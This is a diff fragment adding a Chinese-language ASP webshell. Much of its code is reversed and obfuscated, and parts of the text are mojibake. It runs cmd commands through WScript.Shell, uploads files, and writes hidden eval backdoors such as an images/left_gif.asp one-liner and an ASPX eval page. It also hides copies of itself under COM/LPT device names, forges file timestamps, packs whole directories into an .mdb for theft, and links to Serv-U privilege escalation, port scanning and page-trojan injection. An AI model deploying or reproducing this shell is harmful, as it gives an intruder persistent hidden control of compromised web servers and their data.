]3[rtS;���****=dwP;toor=diU;emaNbD=esabataD;6033=troP;��&PIrevreS&��=revreS;}lqSyM{=revirD��� = ]2[rtS;���****=dwP;as=diU;emaNbD=esabataD;3341,��&PIrevreS&��=revreS;}revreS lqS{=revirD��� = ]1[rtS;���***=drowssaP esabataD:BDELO teJ;bdm.bd\\��&))��htaPredloF��(noisseS(htaPeR&��=ecruoS ataD;0.4.BDELO.teJ.tfosorciM=redivorP��� = ]0[rtS;)21(yarrA wen = rtS};eslaf nruter{)0<i(fi{)i(rtSbDlluF noitcnuf��SRR���};eurt nruter};eslaf nruter;)0(rtSbDlluF;)�����������������(trela{)����� == eulav.rtSbD.mroFbD(fi{)(kcehCbD noitcnuf��SRR���}};����� = eulav.emaNF.mrofedih.pot{esle};)(timbus.mrofedih.pot;noitcAF = eulav.noitcA.mrofedih.pot{)llun=!emaND(fi};���rehtO��� = emaND{esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,��壡�ڴ���Ǽ�����ע,����ȫ����bdM����ѹҪ��������(tpmorp = emaND{)���bdMtcapmoC���==noitcAF(fi esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,��壡��ͬ�ܲ���ע,����ȫ����bdM�Ľ���Ҫ��������(tpmorp = emaND{)���bdMetaerC���==noitcAF(fi esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,������ȫ�м��ĵĽ���Ҫ��������(tpmorp = emaND{)���redloFweN���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ�м��ı�Ŀ��������������(tpmorp = emaND{)���redloFevoM���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ�м��ı�Ŀ��������������(tpmorp = emaND{)���redloFypoC���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ���ı�Ŀ��������������(tpmorp = emaND{)���eliFevoM���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ���ı�Ŀ���Ƹ���������(tpmorp = emaND{)���eliFypoC���==noitcAF(fi;emaNF = eulav.emaNF.mrofedih.pot{)noitcAF,emaNF(mroFlluF noitcnuf��SRR���};)(timbus.mrofrdda.pot;redloF = eulav.htaPredloF.mrofrdda.pot{)redloF(redloFwohS noitcnuf��SRR���;)(kcolCnur};yalpsid+���--  ��&DA&��������=sutats.wodniw;)(gnirtSelacoLot.yadot =yalpsid rav;)(etaD wen = yadot rav;)001 ,���)(kcolCnur���(tuoemiTtes.wodniw = emiTeht{)(kcolCnur noitcnuf��SRR���};eslaf nruter esle;eurt nruter))��壿�����ٴ���ִҪ��ȷ���(mrifnoc( fi{)(kosey noitcnuf��SRR���;srorrEllik=rorreno.wodniw};eurt nruter{)(srorrEllik noitcnuf>tpircsavaj=egaugnal tpircs<��SRR"
+ExeCuTe(ShiSanFun(ShiSan))
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim ObT(13,2)
+ObT(0,0) = "Scripting.FileSystemObject"
+  ObT(0,2) = "�ļ��������"
+ObT(1,0) = "wscript.shell"
+  ObT(1,2) = "������ִ�����"
+ObT(2,0) = "ADOX.Catalog"
+  ObT(2,2) = "ACCESS�������"
+ObT(3,0) = "JRO.JetEngine"
+  ObT(3,2) = "ACCESSѹ�����"
+ObT(4,0) = "Scripting.Dictionary" 
+  ObT(4,2) = "�������ϴ��������"
+ObT(5,0) = "Adodb.connection"
+  ObT(5,2) = "���ݿ��������"
+ObT(6,0) = "Adodb.Stream"
+  ObT(6,2) = "�������ϴ����"
+ObT(7,0) = "SoftArtisans.FileUp"
+  ObT(7,2) = "SA-FileUp �ļ��ϴ����"
+ObT(8,0) = "LyfUpload.UploadFile"
+  ObT(8,2) = "���Ʒ��ļ��ϴ����"
+ObT(9,0) = "Persits.Upload.1"
+  ObT(9,2) = "ASPUpload �ļ��ϴ����"
+ObT(10,0) = "JMail.SmtpMail"
+  ObT(10,2) = "JMail �ʼ��շ����"
+ObT(11,0) = "CDONTS.NewMail"
+  ObT(11,2) = "����SMTP�������"
+ObT(12,0) = "SmtpMail.SmtpMail.1"
+  ObT(12,2) = "SmtpMail�������"
+ObT(13,0) = "Microsoft.XMLHTTP"
+  ObT(13,2) = "���ݴ������"
+For i=0 To 13
+	Set T=Server.CreateObject(ObT(i,0))
+	If -2147221005 <> Err Then
+	  IsObj=" ��"
+	Else
+	  IsObj=" ��"
+	  Err.Clear
+	End If
+	Set T=Nothing
+	ObT(i,1)=IsObj
+Next
+If FolderPath<>"" then
+  Session("FolderPath")=RRePath(FolderPath)
+End If
+If Session("FolderPath")="" Then
+  FolderPath=RootPath
+  Session("FolderPath")=FolderPath
+End if
+function php():On Error Resume Next:set fso=Server.CreateObject(oBt(0,0)):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo 'oo��_��oo'?><?php phpinfo()?>":fso.CreateTextFile(server.mappath("test.jsp")).Write"Jsp Test oo��_��oo":fso.CreateTextFile(Server.MapPath("/")&"/images/left_gif.asp").Write""&chr(60)&"%Eval(Request(chr(63))):"&chr(37)&""&chr(62)&"":
+fso.CreateTextFile(server.mappath("test.aspx")).Write""&chr(60)&"%@ Page Language=""Jscript"" validateRequest=""false"" "&chr(37)&""&chr(62)&""&chr(60)&""&chr(37)&"Response.Write(eval(Request.Item[""w""],""unsafe""));"&chr(37)&""&chr(62)&"aspx Test oo��_��oo":
+RRS"<center><iframe src=test.php width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; ":
+RRS"<iframe src=test.jsp width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; ":
+RRS"<iframe src=test.aspx width=300 height=100></iframe>&nbsp;&nbsp;&nbsp; </center>":
+RRS"<br><br><p><br><p><br><br><p><br><center>Test<p></font><p><a href='?Action=apjdel'><font size=5 color=red>(ɾ�������ļ�!)</font> "&copyurl&"</a></center>":RRS Efun&""&serveru&"&p="&UserPass&"'><script>"
+End function:function apjdel():set fso=Server.CreateObject(oBt(0,0)):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):
+RRS"Del Success!":End function
+Function MainForm()
+RRS"<form name=""hideform"" method=""post"" action="""&urL&""" target=""FileFrame"">":
+RRS"<input type=""hidden"" name=""Action"">":
+RRS"<input type=""hidden"" name=""FName"">":
+RRS"</form>":
+RRS"<table width='100%' height='100%'  border=0 cellpadding='1' cellspacing='0'>":
+RRS"<tr><td height='30' colspan='2'>":
+RRS"<table width='100%'>":
+RRS"<form name='addrform' method='post' action='"&Url&"' target='_parent'>":
+RRS"<tr><td width='60' align='center'>��ַ����</td><td>":
+RRS"<input name='FolderPath' style='width:100%' value='"&SesSIon("FolderPath")&"'>":
+RRS"</td><td width='140' align='center'><input name='Submit' type='submit' value='ת��'> <input type='submit' value='ˢ��������' onclick='FileFrame.location.reload()'>" :
+RRS"  <tr align='center' valign='middle'>":
+RRS"<tr>��ȨĿ¼�б�����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>��ʼ <b>��</b> ����</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>C:\\RECYCLER</a>����<a href='javascript:ShowFolder(""D:\\RECYCLER\\"")'>D:\RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>����<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>����<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>����<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>Documents</a>��</td><td>":
+RRS"</td></tr></form></table></td></tr><tr><td width='170'>":
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>":
+RRS"<td>":
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe>":
+RRS"</td></tr></table>"
+
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+
+Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>":RRS"<tr><td height='5'></td></tr>":RRS"<tr><td><center><font color=red>"&mName&"</font></center></a><hr hight=1 width='100%'>":RRS"</td></tr>":If ObT(0,1)=" ��" Then:RRS"<tr><td height='24'>��Ȩ��</td></tr>":Else:RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""><b> +>�鿴Ӳ��</b><div id=menu1 style=""width:100%;display='none'"" onmouseout=""menu1.style.display='none'"">":Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing:RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>->վ��<b>��Ŀ¼</b></a></td></tr>":RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>->��<b>����Ŀ¼</b></a></td></tr>":RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Progra~1"")'>->C:\\Progra~1</a></td></tr>":RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Docume~1"")'>->C:\\Docume~1</a></td></tr>":RRS"":RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>->�½�Ŀ¼</a></td></tr>":RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>->�½��ı�</a></td></tr>":End If::RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>->�ϴ��ļ�</a></td></tr>"::RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>->ϵͳ����-�û��˺�</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=getTerminalInfo' target='FileFrame'><b>->�ն˶˿�-�Զ���¼</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=ServerInfo' target='FileFrame'>->��������Ϣ-���֧��</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'><b>->ִ��CMD����</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=SetFileText' target='FileFrame'><b>->�޸��ļ�����</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=php' target='FileFrame'><b>->�ű�̽��</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=hiddenshell' target='FileFrame'><b>->�������ش���</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'><b>->Servu��Ȩ</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'><b>->�����ļ�</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>->����<b>��</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>->����<b>��</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>->����<b>�滻</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>->������(��ͨ��)</a></b></td></tr>":RRS"<tr><td height='22'><a href='?Action=PageAddToMdb' target='FileFrame'>->�ļ��д��-�����</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=ReadREG' target='FileFrame'>->��ȡע�������</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=ScanPort' target='FileFrame'>->�˿�ɨ����</a></td></tr>":RRS"<tr><td height='24' onmouseover=""menu2.style.display=''""><b>+>���ݿ����</b><div id=menu2 style=""line-height:18px;width:100%;display='none'"" onmouseout=""menu2.style.display='none'"">":RRS"&nbsp;&nbsp;&nbsp;<a href='?Action=DbManager' target='FileFrame'>�������ݿ�</a><br>":RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\New.mdb")&""",""CreateMdb"")'>����MDB�ļ�</a><br>":RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\data.mdb")&""",""CompactMdb"")'>ѹ��MDB�ļ�</a></div></td></tr>"::RRS"<tr><td height='22'><a href='?Action=Logout' target='_top'>->�˳���¼</a></td></tr>":RRS"<tr><td align=center style='color:red'><hr>"&Copyright&"</td></tr></table>":
+RRS"</table>"
+End Function
+	Sub PageAddToMdb()
+		Dim theAct, thePath
+		theAct = Request("theAct")
+		thePath = Request("thePath")
+		Server.ScriptTimeOut = 5000
+		If theAct = "addToMdb" Then
+			addToMdb(thePath)
+			RRS "�������!"
+			Response.End
+		End If
+		If theAct = "releaseFromMdb" Then
+			unPack(thePath)
+			RRS"�������!"
+			Response.End
+		End If
+		RRS "�ļ��д��:<br/>"
+		RRS "<form method=post target=main>"
+		RRS "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
+		RRS "<input type=hidden value=addToMdb name=theAct>"
+		RRS "<select name=theMethod><option value=fso>FSO</option><option value=app>��FSO</option>"
+		RRS "</select>"
+		RRS "<br><input type=submit value='��ʼ���'>"
+		RRS "<hr/>ע: �������HYTop.mdb�ļ�,λ��ľMMͬ��Ŀ¼��"
+		RRS "</form>"
+		RRS "<hr/>�ļ����⿪(��FSO֧��):<br/>"
+		RRS "<form method=post target=main>"
+		RRS "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & "\HYTop.mdb"" size=80>"
+		RRS "<input type=hidden value=releaseFromMdb name=theAct><input type=submit value='���ҽ⿪'>"
+		RRS "<hr/>ע: �⿪���������ļ���λ��ľMMͬ��Ŀ¼��"
+		RRS "</form>"
+		RRS "<hr/>"
+	End Sub
+	Sub addToMdb(thePath)
+		On Error Resume Next
+		Dim rs, conn, stream, connStr, adoCatalog
+		Set rs = Server.CreateObject("ADODB.RecordSet")
+		Set stream = Server.CreateObject("ADODB.Stream")
+		Set conn = Server.CreateObject("ADODB.Connection")
+		Set adoCatalog = Server.CreateObject("ADOX.Catalog")
+		connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HYTop.mdb")
+		adoCatalog.Create connStr
+		conn.Open connStr
+		conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
+		stream.Open
+		stream.Type = 1
+		rs.Open "FileData", conn, 3, 3
+		If Request("theMethod") = "fso" Then
+			fsoTreeForMdb thePath, rs, stream
+		 Else
+			saTreeForMdb thePath, rs, stream
+		End If
+		rs.Close
+		Conn.Close
+		stream.Close
+		Set rs = Nothing
+		Set conn = Nothing
+		Set stream = Nothing
+		Set adoCatalog = Nothing
+	End Sub
+	Function fsoTreeForMdb(thePath, rs, stream)
+		Dim item, theFolder, folders, files, sysFileList
+		sysFileList = "$HYTop.mdb$HYTop.ldb$"
+		If fsoX.FolderExists(thePath) = False Then
+			showErr(thePath & " Ŀ¼�����ڻ��߲���������!")
+		End If
+		Set theFolder = fsoX.GetFolder(thePath)
+		Set files = theFolder.Files
+		Set folders = theFolder.SubFolders
+		For Each item In folders
+			fsoTreeForMdb item.Path, rs, stream
+		Next
+		For Each item In files
+			If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+				rs.AddNew
+				rs("thePath") = Mid(item.Path, 4)
+				stream.LoadFromFile(item.Path)
+				rs("fileContent") = stream.Read()
+				rs.Update
+			End If
+		Next
+		Set files = Nothing
+		Set folders = Nothing
+		Set theFolder = Nothing
+	End Function
+	function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+
+	Sub unPack(thePath)
+		On Error Resume Next
+		Server.ScriptTimeOut = 5000
+		Dim rs, ws, str, conn, stream, connStr, theFolder
+		str = Server.MapPath(".") & "\"
+		Set rs = CreateObject("ADODB.RecordSet")
+		Set stream = CreateObject("ADODB.Stream")
+		Set conn = CreateObject("ADODB.Connection")
+		connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
+		conn.Open connStr
+		rs.Open "FileData", conn, 1, 1
+		stream.Open
+		stream.Type = 1
+		Do Until rs.Eof
+			theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
+			If fsoX.FolderExists(str & theFolder) = False Then
+				createFolder(str & theFolder)
+			End If
+			stream.SetEos()
+			stream.Write rs("fileContent")
+			stream.SaveToFile str & rs("thePath"), 2
+			rs.MoveNext
+		Loop
+		rs.Close
+		conn.Close
+		stream.Close
+		Set ws = Nothing
+		Set rs = Nothing
+		Set stream = Nothing
+		Set conn = Nothing
+	End Sub
+	Sub createFolder(thePath)
+		Dim i
+		i = Instr(thePath, "\")
+		Do While i > 0
+			If fsoX.FolderExists(Left(thePath, i)) = False Then
+				fsoX.CreateFolder(Left(thePath, i - 1))
+			End If
+			If InStr(Mid(thePath, i + 1), "\") Then
+				i = i + Instr(Mid(thePath, i + 1), "\")
+			 Else
+				i = 0
+			End If
+		Loop
+	End Sub
+	Sub saTreeForMdb(thePath, rs, stream)
+		Dim item, theFolder, sysFileList
+		sysFileList = "$HYTop.mdb$HYTop.ldb$"
+		Set theFolder = saX.NameSpace(thePath)
+		For Each item In theFolder.Items
+			If item.IsFolder = True Then
+				saTreeForMdb item.Path, rs, stream
+			 Else
+				If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+					rs.AddNew
+					rs("thePath") = Mid(item.Path, 4)
+					stream.LoadFromFile(item.Path)
+					rs("fileContent") = stream.Read()
+					rs.Update
+				End If
+			End If
+		Next
+		Set theFolder = Nothing
+	End Sub
+	sub SetFileText()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS "<form method=post>"
+RRS "<center>·&nbsp;&nbsp;&nbsp;&nbsp;����<input name='path1' value='"&WWWROOT&"' size='60'>(һ��Ҫ��\��β)<br/>"
+RRS "&nbsp;�ļ����ƣ�<input name=filename value='index.asp' size='60'>(Ҫ�޸ĵ��ļ���)<br/>"
+RRS "&nbsp;&nbsp;&nbsp;�޸�ʱ�䣺<input name=time value='12/21/2012 23:59:59' size='60'>&nbsp;��/��/�� ʱ:��:��<br/>"
+RRS "<select onChange='this.form.shuxing.value=this.value;'>"
+RRS "<option value=''>��ͨ </option>"
+RRS "<option value='1'>ֻ�� </option>"
+RRS "<option value='2'>���� </option>"
+RRS "<option value='4'>ϵͳ</option>"
+RRS "<option value='33'>ֻ��,�浵 </option>"
+RRS "<option value='34'>����,�浵 </option>"
+RRS "<option value='35'>ֻ������,�浵 </option>"
+RRS "<option value='39'>ֻ������,�浵,ϵͳ </option>"
+RRS "�޸� ���ԣ�<input name=shuxing value='0' size='40'><br/>"
+RRS "<input type=submit value=�޸�>"
+RRS "</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject(obt(0,0))
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS "</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;������� </center>"
+end if
+end sub
+Function Course()
+ShiSan="����>elbat/<��&2IS&1IS&0IS&IS SRR��txen��fi dne���>rt/<>dt/<>tnof/<��&htap.jbo&��;psbn&>FF9933#=roloc tnof<]��&xl&��:���ද��[>���2���=napsloc ���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&emaNyalpsiD.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>dt/<��&emaN.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&2IS=2IS��esle���>rt/<>dt/<>tnof/<��&htap.jbo&��;psbn&>0000FF#=roloc tnof<]��&xl&��:���ද��[>���2���=napsloc ���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&emaNyalpsiD.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>dt/<��&emaN.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&1IS=1IS��neht 2=epyTtratS.JBO dna ��niw��><))3,4,htap.jbo(dim(esaCL fi����ý���=xl neht 4=epyTtratS.JBO fi��嶯�֩�=xl neht 3=epyTtratS.JBO fi��嶯�ԩ�=xl neht 2=epyTtratS.JBO fi��fi dne�� ��>rt/<>dt/<;psbn&>���2���=napsloc ���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��=0IS���>rt/<>dt/<��&IS=IS���)��(����ͳϵ��&IS=IS�� ��;psbn&>���FFFFFF#���=rolocgb dt<>dt/<��&IS=IS��emaN.jbo&IS=IS���;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<��&IS=IS���>rt<��&IS=IS��neht ���=epyTtratS.JBO fi��raelc.rre��)��.//:TNniW��(tcejbOteg ni jbo hcae rof��txen emuser rorre no���>rt/<>dt/<����뻧��ͳϵ>'unem'=rolocgb 'retnec'=ngila '3'=napsloc '02'=thgieh dt<>rt<��&IS=IS���>'retnec'=ngila '0'=gniddapllec '1'=gnicapsllec '0'=redrob 'unem'=rolocgb '006'=htdiw elbat<>rb<��=IS"
+ExeCuTe(ShiSanFun(ShiSan))
+End Function
+Function ServerInfo()
+ShiSan="���IS SRR��txeN���>rt/<>dt/<��&)2,i(TbO&��>tfel=ngila 'FFFFFF#'=rolocgb dt<>dt/<��&)1,i(TbO&��>'FFFFFF#'=rolocgb dt<>dt/<��&)0,i(TbO&��>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS��31 oT 0=i roF���>rt/<>dt/<��&)��ERAWTFOS_REVRES��(selbairaVrevreS.tseuqeR&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<���������BEW>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<��&)��SO��(selbairaVrevreS.tseuqeR&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<ͳϵ���������>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<��&)��SROSSECORP_FO_REBMUN��(selbairaVrevreS.tseuqeR&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<����UPC�����>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<;psbn&��&won&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<��ʱ�����>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>mrof/<>rt/<>dt/<>'2'=eulav 'noitca'=eman 'neddih'=epyt tupni<>'xp0:redrob'=elyts'ѯ��'=eulav 'timbus'=epyt tupni<>'xp0:redrob'=elyts'��&)��RDDA_LACOL��(selbairaVrevreS.tseuqeR&��'=eulav '51'=ezis 'pi'=eman 'txet'=epyt tupni<��&IS=IS���>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<PI�����>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<>'knalb_'=tegrat 'mrofpi'=eman 'psa.xedni/moc.831pi.www//:ptth'=noitca tsop=dohtem mrof<��&IS=IS���>rt/<>dt/<��&)��EMAN_REVRES��(selbairaVrevres.tseuqer&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<�������>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<Ϣ�ż��������>'unem'=rolocgb 'retnec'=ngila '3'=napsloc '02'=thgieh dt<>rt<��&IS=IS���>'retnec'=ngila '0'=gniddapllec '1'=gnicapsllec '0'=redrob 'unem'=rolocgb '%08'=htdiw elbat<>rb<��=IS"
+ExeCuTe(ShiSanFun(ShiSan))
+End Function
+Function DownFile(Path)
+ShiSan="���gnihtoN = MSO teS��esolC.MSO��hsulF.esnopseR��daeR.MSO etirWyraniB.esnopseR���maerts-tetco/noitacilppa�� = epyTtnetnoC.esnopseR���8-FTU�� = tesrahC.esnopseR��eziS.MSO ,��htgneL-tnetnoC�� redaeHddA.esnopseR��)zs,htap(diM & ��=emanelif ;tnemhcatta�� ,��noitisopsiD-tnetnoC�� redaeHddA.esnopseR��1+)��\��,htap(veRrtsnI=zs��htaP eliFmorFdaoL.MSO��1 = epyT.MSO��nepO.MSO��))0,6(TbO(tcejbOetaerC = MSO teS��raelC.esnopseR"
+ExeCuTe(ShiSanFun(ShiSan))
+End Function
+Function HTMLEncode(S)
+  if not isnull(S) then
+    S = replace(S, ">", "&gt;")
+    S = replace(S, "<", "&lt;")
+    S = replace(S, CHR(39), "&#39;")
+    S = replace(S, CHR(34), "&quot;")
+    S = replace(S, CHR(20), "&nbsp;")
+    HTMLEncode = S
+  end if
+End Function
+Function UpFile()
+  If Request("Action2")="Post" Then
+    Set U=new UPC : Set F=U.UA("LocalFile")
+	UName=U.form("ToPath")
+    If UName="" Or F.FileSize=0 then
+      SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+    Else
+        F.SaveAs UName
+        If Err.number=0 Then
+          SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+		End if
+	End If
+	Set F=nothing:Set U=nothing
+	SI=SI&BackUrl
+	RRS SI
+	ShowErr()
+	Response.End
+  End If
+    SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+    SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+    SI=SI&"<tr><td>"
+    SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\cmd.exe")&"' size='40'>"
+    SI=SI&" <input name='LocalFile' type='file'  size='25'>"
+    SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+    SI=SI&"</td></tr></form></table>"
+  RRS SI
+End Function
+sub hiddenshell
+fpath=request.servervariables("path_translated")
+set fso=server.createobject("scripting.filesystemobject")
+pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9"
+rndpex=split(pex,"|")(rndnumber(0,17))
+session("seljw")=""
+filepath1=server.mappath(".")
+filename1=right(fpath,len(fpath)-instrrev(fpath,"\"))
+url=request.servervariables("url")
+url=left(url,instrrev(url,"/"))&rndpex&"."&filename1
+fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1
+set fso=nothing
+RRS "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub
+
+Function Cmd1Shell()
+ShiSan="���IS SRR���>mrof/<>aeratxet/<��&)31(rhc&IS=IS��fI dnE��fi dne��aaa&IS=IS��)eurT ,eliFpmeTzs(eliFeteleD.osf llaC��esolC.xcleliFo��)llAdaeR.xcleliFo(edocnELMTH.revreS=aaa��)0 ,eslaF ,1 ,eliFpmeTzs( eliFtxeTnepO.sf = xcleliFo teS��)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC = sf teS��)eurT ,0 ,eliFpmeTzs & �� > �� & dmCfeD & �� c/ ��&htaPllehS( nuR.sw llaC��)��txt.dmc��(htappam.revres = eliFpmeTzs��)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS=osf teS��)��llehS.tpircSW��(tcejbOetaerC.revreS=sw teS��)��llehS.tpircSW��(tcejbOetaerC.revreS=sw teS��txeN emuseR rorrE nO��esle��aaa&IS=IS��lladaer.tuodts.DD=aaa��)dmCfeD&�� c/ ��&htaPllehS(cexe.MC=DD teS��))0,1(TbO(tcejbOetaerC=MC teS��neht ��sey��=)��tpircsw��(mroF.tseuqeR fi��nehT ���><)��dmc��(mroF.tseuqeR fI���>'dmc'=ssalc ';044:thgieh;%001:htdiw'=elytS aeratxet<>'��ִ'=eulav 'timbus'=epyt tupni< >'��&dmCfeD&��'=eulav '%29:htdiw'=elytS 'dmc'=eman tupni<��&IS=IS���llehS.tpircSW>��&dekcehc&��'sey'=eulav 'tpircsw'=eman 'xobkcehc'=epyt c=ssalc 